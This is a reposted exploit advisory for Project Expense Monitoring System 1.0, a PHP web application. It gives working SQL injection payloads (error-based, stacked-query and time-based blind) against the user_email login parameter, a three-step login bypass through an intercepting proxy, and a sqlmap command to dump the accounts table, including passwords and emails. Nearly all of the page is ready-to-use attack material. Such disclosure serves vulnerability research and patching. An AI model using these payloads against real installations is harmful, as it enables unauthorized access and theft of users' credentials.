Project Expense Monitoring System 1.0 SQL Injection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 30th, 2021 📆 | 6409 Views ⚑

0

Project Expense Monitoring System 1.0 SQL Injection ≈ Packet Storm

# Exploit Title: Project Expense Monitoring System | SQL Login Bypass (Multiple)
# Exploit Author: Richard Jones
# Date: 2021-03-28
# Vendor Homepage: https://www.sourcecodester.com/php/14001/project-expense-monitoring-system-project-php-source-code-2020.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14001&title=Project+Expense+Monitoring+System+Project+in+PHP+With+Source+Code+
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Parameter: user_email (POST)
Type: error-based
Title: MySQL >= 5.6 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: [email protected]’ AND GTID_SUBSET(CONCAT(0x716a6a6271,(SELECT (ELT(2231=2231,1))),0x71626b7a71),2231)– zfOO&user_pass=a&btnLogin=Login
Vector: AND GTID_SUBSET(CONCAT(‘[DELIMITER_START]’,([QUERY]),'[DELIMITER_STOP]’),[RANDNUM])

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: [email protected]’;SELECT SLEEP(5)#&user_pass=a&btnLogin=Login
Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: [email protected]’ AND (SELECT 2456 FROM (SELECT(SLEEP(5)))Dqoh)– MoOh&user_pass=a&btnLogin=Login
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

#URL: http://TARGET/pems/login.php

Steps:
1) Capture post request in burp.
2) Change post data to
“`
[email protected]’ AND (SELECT 2456 FROM (SELECT(SLEEP(5)))Dqoh)– MoOh&user_pass=a&btnLogin
“`
3) Logged in.

Addition:
Use sqlmap on the saved post request (save as sql.txt)
“`
sqlmap -r sql.txt –batch -D pemsdb -T tblaccounts
“`
Will list applications users,passwords,emails,accounttype

Source link

Tagged with:



Leave a Reply